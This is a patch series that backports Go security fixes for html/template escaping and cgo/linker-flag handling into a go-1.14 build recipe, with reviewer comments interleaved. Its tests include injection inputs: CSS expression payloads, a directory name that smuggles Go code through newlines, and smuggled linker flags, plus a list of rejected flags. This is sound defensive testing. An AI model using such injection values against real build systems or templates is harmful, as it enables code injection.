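+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
+CVE: CVE-2023-24539
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/css.go | 2 +-
+ src/html/template/css_test.go | 2 ++
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/css.go b/src/html/template/css.go
+index 890a0c6b227fe..f650d8b3e843a 100644
+--- a/src/html/template/css.go
++++ b/src/html/template/css.go
+@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
+ // inside a string that might embed JavaScript source.
+ for i, c := range b {
+ switch c {
+- case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
++ case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
+ return filterFailsafe
+ case '-':
+ // Disallow <!-- or -->.
+diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
+index a735638b0314f..2b76256a766e9 100644
+--- a/src/html/template/css_test.go
++++ b/src/html/template/css_test.go
+@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
+ {`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
+ {`-expre\0000073sion`, "-expre\x073sion"},
+ {`@import url evil.css`, "ZgotmplZ"},
++ {"<", "ZgotmplZ"},
++ {">", "ZgotmplZ"},
+ }
+ for _, test := range tests {
+ got := cssValueFilter(test.css)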
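Review bot: The css.go hunk header in this patch still reads `func cssValueFilter(args ...any) string`, and `any` is Go 1.18+ syntax, so the patch looks like it was taken unrefreshed from a newer branch than the go-1.14 tree it is applied to. The changed `case` line carries no version-specific syntax and should apply by context, but it is worth confirming that it applies to the 1.14 sources without fuzz and regenerating the patch against that tree. Separately, the trailer is written `Upstream-Status: Backport from [...]` here and in CVE-2023-29400.patch, while the other patches in view use `Upstream-Status: Backport [...]`; I would use the latter form throughout.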
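--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
+From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Tue, 11 Apr 2023 16:27:43 +0100
+Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
+ whitespace characters
+
+Rather than just a small set. Character class as defined by \s [0].
+
+Thanks to Juho Nurminen of Mattermost for reporting this.
+
+For #59721
+Fixes #59813
+Fixes CVE-2023-24540
+
+[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
+
+Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+TryBot-Bypass: Carlos Amedee <carlos@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
+CVE: CVE-2023-24540
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 8 +++++++-
+ src/html/template/js_test.go | 11 +++++++----
+ 2 files changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index fe7054efe5cd8..4e05c1455723f 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -13,6 +13,11 @@ import (
+ "unicode/utf8"
+ )
+
++// jsWhitespace contains all of the JS whitespace characters, as defined
++// by the \s character class.
++// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
++const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
++
+ // nextJSCtx returns the context that determines whether a slash after the
+ // given run of tokens starts a regular expression instead of a division
+ // operator: / or /=.
+@@ -26,7 +31,8 @@ import (
+ // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
+ // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
+ func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
+- s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
++ // Trim all JS whitespace characters
++ s = bytes.TrimRight(s, jsWhitespace)
+ if len(s) == 0 {
+ return preceding
+ }
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index e07c695f7a77d..e52180cc113b5 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
+ {jsCtxDivOp, "0"},
+ // Dots that are part of a number are div preceders.
+ {jsCtxDivOp, "0."},
++ // Some JS interpreters treat NBSP as a normal space, so
++ // we must too in order to properly escape things.
++ {jsCtxRegexp, "=\u00A0"},
+ }
+
+ for _, test := range tests {
+- if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+- if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+ }
+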
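Review bot: The js_test.go hunk adds a single case, `{jsCtxRegexp, "=\u00A0"}`, while `jsWhitespace` in js.go extends the trimmed set by many more code points (`\v`, `\u1680`, `\u2000` through `\u200a`, `\u202f`, `\u205f`, `\u3000`, `\ufeff`). A typo in any of those escapes would leave that character untrimmed in `nextJSCtx` and no test would notice. I would add a loop to TestNextJsCtx that ranges over `jsWhitespace` and checks that `"="` followed by each rune still yields `jsCtxRegexp`. The test function starts and ends outside the hunk.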
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
1From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 13 Apr 2023 14:01:50 -0700
4Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
5 value
6
7An unquoted action used as an attribute value can result in unsafe
8behavior if it is empty, as HTML normalization will result in unexpected
9attributes, and may allow attribute injection. If executing a template
10results in a empty unquoted attribute value, emit filterFailsafe
11instead.
12
13Thanks to Juho Nurminen of Mattermost for reporting this issue.
14
15Fixes #59722
16Fixes CVE-2023-29400
17
18Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
19Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
20Reviewed-by: Julie Qiu <julieqiu@google.com>
21Run-TryBot: Roland Shoemaker <bracewell@google.com>
22Reviewed-by: Damien Neil <dneil@google.com>
23Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
24Run-TryBot: Carlos Amedee <carlos@golang.org>
25Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
26Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
27TryBot-Result: Gopher Robot <gobot@golang.org>
28
29Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
30CVE: CVE-2023-29400
31Signed-off-by: Ashish Sharma <asharma@mvista.com>
32---
33 src/html/template/escape.go | 5 ++---
34 src/html/template/escape_test.go | 15 +++++++++++++++
35 src/html/template/html.go | 3 +++
36 3 files changed, 20 insertions(+), 3 deletions(-)
37
38diff --git a/src/html/template/escape.go b/src/html/template/escape.go
39index 4ba1d6b31897e..a62ef159f0dcd 100644
40--- a/src/html/template/escape.go
41+++ b/src/html/template/escape.go
42@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
43 // for all x.
44 var redundantFuncs = map[string]map[string]bool{
45 "_html_template_commentescaper": {
46- "_html_template_attrescaper": true,
47- "_html_template_nospaceescaper": true,
48- "_html_template_htmlescaper": true,
49+ "_html_template_attrescaper": true,
50+ "_html_template_htmlescaper": true,
51 },
52 "_html_template_cssescaper": {
53 "_html_template_attrescaper": true,
54diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
55index 3dd212bac9406..f8b2b448f2dfa 100644
56--- a/src/html/template/escape_test.go
57+++ b/src/html/template/escape_test.go
58@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
59 `<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
60 `<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
61 },
62+ {
63+ "unquoted empty attribute value (plaintext)",
64+ "<p name={{.U}}>",
65+ "<p name=ZgotmplZ>",
66+ },
67+ {
68+ "unquoted empty attribute value (url)",
69+ "<p href={{.U}}>",
70+ "<p href=ZgotmplZ>",
71+ },
72+ {
73+ "quoted empty attribute value",
74+ "<p name=\"{{.U}}\">",
75+ "<p name=\"\">",
76+ },
77 }
78
79 for _, test := range tests {
80diff --git a/src/html/template/html.go b/src/html/template/html.go
81index bcca0b51a0ef9..a181699a5bda8 100644
82--- a/src/html/template/html.go
83+++ b/src/html/template/html.go
84@@ -14,6 +14,9 @@ import (
85 // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
86 func htmlNospaceEscaper(args ...interface{}) string {
87 s, t := stringify(args...)
88+ if s == "" {
89+ return filterFailsafe
90+ }
91 if t == contentTypeHTML {
92 return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
93 }
94
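Review bot: The escape.go hunk drops `"_html_template_nospaceescaper": true` from the `_html_template_commentescaper` entry of `redundantFuncs` without recording why, and the reason is easy to lose in a later refresh of this backport. It presumably follows from the html.go change: once `htmlNospaceEscaper` maps an empty string to `filterFailsafe`, it no longer leaves an empty result from the preceding escaper unchanged, which is the property the comment above the map (only its last line, `// for all x.`, is in the hunk) appears to require; that should be confirmed against the comment escaper, which is not shown. I would note it beside the entry, e.g. `// nospaceescaper is not redundant here: it turns "" into filterFailsafe.`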
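--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
+rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
+From: "Bryan C. Mills" <bcmills@google.com>
+Date: Fri, 12 May 2023 14:15:16 -0400
+Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
+ containing newlines
+
+Directory or file paths containing newlines may cause tools (such as
+cmd/cgo) that emit "//line" or "#line" -directives to write part of
+the path into non-comment lines in generated source code. If those
+lines contain valid Go code, it may be injected into the resulting
+binary.
+
+(Note that Go import paths and file paths within module zip files
+already could not contain newlines.)
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60167.
+Fixes #60515.
+Fixes CVE-2023-29402.
+
+Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
+CVE: CVE-2023-29402
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/load/pkg.go | 4 +
+ src/cmd/go/internal/work/exec.go | 6 ++
+ src/cmd/go/script_test.go | 1 +
+ .../go/testdata/script/build_cwd_newline.txt | 100 ++++++++++++++++++
+ 4 files changed, 111 insertions(+)
+ create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
+
+diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
+index 369a79b..d2b63b0 100644
+--- a/src/cmd/go/internal/load/pkg.go
++++ b/src/cmd/go/internal/load/pkg.go
+@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
+ setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
+ return
+ }
++ if strings.ContainsAny(p.Dir, "\r\n") {
++ setError(fmt.Errorf("invalid package directory %q", p.Dir))
++ return
++ }
+
+ // Build list of imported packages and full dependency list.
+ imports := make([]*Package, 0, len(p.Imports))
+diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
+index 9a9650b..050b785 100644
+--- a/src/cmd/go/internal/work/exec.go
++++ b/src/cmd/go/internal/work/exec.go
+@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
+ b.Print(a.Package.ImportPath + "\n")
+ }
+
++ if p.Error != nil {
++ // Don't try to build anything for packages with errors. There may be a
++ // problem with the inputs that makes the package unsafe to build.
++ return p.Error
++ }
++
+ if a.Package.BinaryOnly {
+ p.Stale = true
+ p.StaleReason = "binary-only packages are no longer supported"
+diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
+index ec498bb..a1398ad 100644
+--- a/src/cmd/go/script_test.go
++++ b/src/cmd/go/script_test.go
+@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
+ "devnull=" + os.DevNull,
+ "goversion=" + goVersion(ts),
+ ":=" + string(os.PathListSeparator),
++ "newline=\n",
+ }
+
+ if runtime.GOOS == "plan9" {
+diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
+new file mode 100644
+index 0000000..61c6966
+--- /dev/null
++++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
+@@ -0,0 +1,100 @@
++[windows] skip 'filesystem normalizes / to \'
++[plan9] skip 'filesystem disallows \n in paths'
++
++# If the directory path containing a package to be built includes a newline,
++# the go command should refuse to even try to build the package.
++
++env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
++
++mkdir $DIR
++cd $DIR
++exec pwd
++cp $WORK/go.mod ./go.mod
++cp $WORK/main.go ./main.go
++cp $WORK/main_test.go ./main_test.go
++
++! go build -o $devnull .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go build -o $devnull main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go run .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go run main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go test .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go test -v main.go main_test.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++
++# Since we do preserve $PWD (or set it appropriately) for commands, and we do
++# not resolve symlinks unnecessarily, referring to the contents of the unsafe
++# directory via a safe symlink should be ok, and should not inject the data from
++# the symlink target path.
++
++[!symlink] stop 'remainder of test checks symlink behavior'
++[short] stop 'links and runs binaries'
++
++symlink $WORK${/}link -> $DIR
++
++go run $WORK${/}link${/}main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++cd $WORK/link
++
++! go run $DIR${/}main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++go run .
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go run main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++go test -v .
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++
++-- $WORK/go.mod --
++module example
++go 1.19
++-- $WORK/main.go --
++package main
++
++import "C"
++
++func main() {
++ /* nothing here */
++ println("ok")
++}
++-- $WORK/main_test.go --
++package main
++
++import "testing"
++
++func TestMain(*testing.M) {
++ main()
++}
+--
+2.25.1
+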
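Review bot: The first line of the added patch reads `rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001`; the leading `F` of the mbox `From ` separator is missing. `patch` skips leading text, so the build is probably unaffected, but tools that read the header as a mail message (for example `git am`) may not recognise the file. The line should be `From c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001`. The added script test also declares `go 1.19` in its go.mod although the recipe is go-1.14, which only matters if the cmd/go script tests are run against this tree.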
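--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
+From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Fri, 5 May 2023 13:10:34 -0700
+Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
+ non-optional arguments
+
+Enforce that linker flags which expect arguments get them, otherwise it
+may be possible to smuggle unexpected flags through as the linker can
+consume what looks like a flag as an argument to a preceding flag (i.e.
+"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
+somewhat more restrictive in the general format of some flags.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60305
+Fixes #60511
+Fixes CVE-2023-29404
+
+Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Run-TryBot: David Chase <drchase@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
+CVE: CVE-2023-29404
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/work/security.go | 6 +++---
+ src/cmd/go/internal/work/security_test.go | 5 +++++
+ 2 files changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
+index a823b20..8acb6dc 100644
+--- a/src/cmd/go/internal/work/security.go
++++ b/src/cmd/go/internal/work/security.go
+@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
+ re(`-Wl,-Bdynamic`),
+ re(`-Wl,-berok`),
+ re(`-Wl,-Bstatic`),
+- re(`-WL,-O([^@,\-][^,]*)?`),
++ re(`-Wl,-O[0-9]+`),
+ re(`-Wl,-d[ny]`),
+ re(`-Wl,--disable-new-dtags`),
+- re(`-Wl,-e[=,][a-zA-Z0-9]*`),
++ re(`-Wl,-e[=,][a-zA-Z0-9]+`),
+ re(`-Wl,--enable-new-dtags`),
+ re(`-Wl,--end-group`),
+ re(`-Wl,--(no-)?export-dynamic`),
+ re(`-Wl,-framework,[^,@\-][^,]+`),
+ re(`-Wl,-headerpad_max_install_names`),
+ re(`-Wl,--no-undefined`),
+- re(`-Wl,-R([^@\-][^,@]*$)`),
++ re(`-Wl,-R,?([^@\-,][^,@]*$)`),
+ re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
+ re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
+ re(`-Wl,-s`),
+diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
+index bd707ff..7b0b7d3 100644
+--- a/src/cmd/go/internal/work/security_test.go
++++ b/src/cmd/go/internal/work/security_test.go
+@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
+ {"-Wl,-R,@foo"},
+ {"-Wl,--just-symbols,@foo"},
+ {"../x.o"},
++ {"-Wl,-R,"},
++ {"-Wl,-O"},
++ {"-Wl,-e="},
++ {"-Wl,-e,"},
++ {"-Wl,-R,-flag"},
+ }
+
+ func TestCheckLinkerFlags(t *testing.T) {
+--
+2.25.1
+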
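Review bot: The security_test.go hunk adds only rejected inputs to `badLinkerFlags`, but the security.go hunk also changes what is accepted. The removed pattern was spelled `-WL,-O` with a capital `L`, so `-Wl,-O[0-9]+` appears to make that flag matchable for the first time, and the `-e` and `-R` patterns now require a non-empty argument. I would pair the new negatives with accepted counterparts in the table of allowed linker flags (outside this hunk, if they are not already there), for example `{"-Wl,-O2"}`, `{"-Wl,-e,main"}` and `{"-Wl,-R,foo"}` (constructed samples), so that a pattern that is too strict is caught as well as one that is too loose. How `re(...)` anchors these expressions is not visible in the hunk.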
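--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
+From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 4 May 2023 14:06:39 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
+ line per flag
+
+The flags that we recorded in _cgo_flags did not use any quoting,
+so a flag containing embedded spaces was mishandled.
+Change the _cgo_flags format to put each flag on a separate line.
+That is a simple format that does not require any quoting.
+
+As far as I can tell only cmd/go uses _cgo_flags, and it is only
+used for gccgo. If this patch doesn't cause any trouble, then
+in the next release we can change to only using _cgo_flags for gccgo.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60306
+Fixes #60514
+Fixes CVE-2023-29405
+
+Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+---
+Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/cmd/cgo/out.go | 4 +++-
+ src/cmd/go/internal/work/gccgo.go | 14 ++++++-------
+ .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
+ 3 files changed, 29 insertions(+), 9 deletions(-)
+ create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d26f9e76a374a..d0c6fe3d4c2c2 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
+
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
++ for _, arg := range v {
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
+ fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
+diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
+index 08a4c2d8166c7..a048b7f4eecef 100644
+--- a/src/cmd/go/internal/work/gccgo.go
++++ b/src/cmd/go/internal/work/gccgo.go
+@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
+ const ldflagsPrefix = "_CGO_LDFLAGS="
+ for _, line := range strings.Split(string(flags), "\n") {
+ if strings.HasPrefix(line, ldflagsPrefix) {
+- newFlags := strings.Fields(line[len(ldflagsPrefix):])
+- for _, flag := range newFlags {
+- // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
+- // but they don't mean anything to the linker so filter
+- // them out.
+- if flag != "-g" && !strings.HasPrefix(flag, "-O") {
+- cgoldflags = append(cgoldflags, flag)
+- }
++ flag := line[len(ldflagsPrefix):]
++ // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
++ // but they don't mean anything to the linker so filter
++ // them out.
++ if flag != "-g" && !strings.HasPrefix(flag, "-O") {
++ cgoldflags = append(cgoldflags, flag)
+ }
+ }
+ }
+diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+new file mode 100644
+index 0000000000000..4e91ae56505b6
+--- /dev/null
++++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+@@ -0,0 +1,20 @@
++# Test that #cgo LDFLAGS are properly quoted.
++# The #cgo LDFLAGS below should pass a string with spaces to -L,
++# as though searching a directory with a space in its name.
++# It should not pass --nosuchoption to the external linker.
++
++[!cgo] skip
++
++go build
++
++[!exec:gccgo] skip
++
++go build -compiler gccgo
++
++-- go.mod --
++module m
++-- cgo.go --
++package main
++// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
++import "C"
++func main() {}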
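Review bot: In the out.go hunk the new call `fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)` passes one argument for two `%s` verbs, so the key `k` is never written and the `_CGO_LDFLAGS=` prefix that the gccgo.go hunk looks for would not appear in `_cgo_flags`. CVE-2023-29405-2.patch in this same commit changes the call to pass `k, arg`, so the result is correct only when both patches are applied, in that order. I would state that in this patch's header, for example `Note: incomplete without CVE-2023-29405-2.patch`, or squash the two files, so that a later refresh or cherry-pick cannot pick up this one alone.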
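--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
+From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Tue, 6 Jun 2023 12:51:17 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
+
+For #60306
+For #60514
+
+Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+---
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+
+ src/cmd/cgo/out.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d0c6fe3d4c2c2..a48f52105628a 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+ for _, arg := range v {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
+ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {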
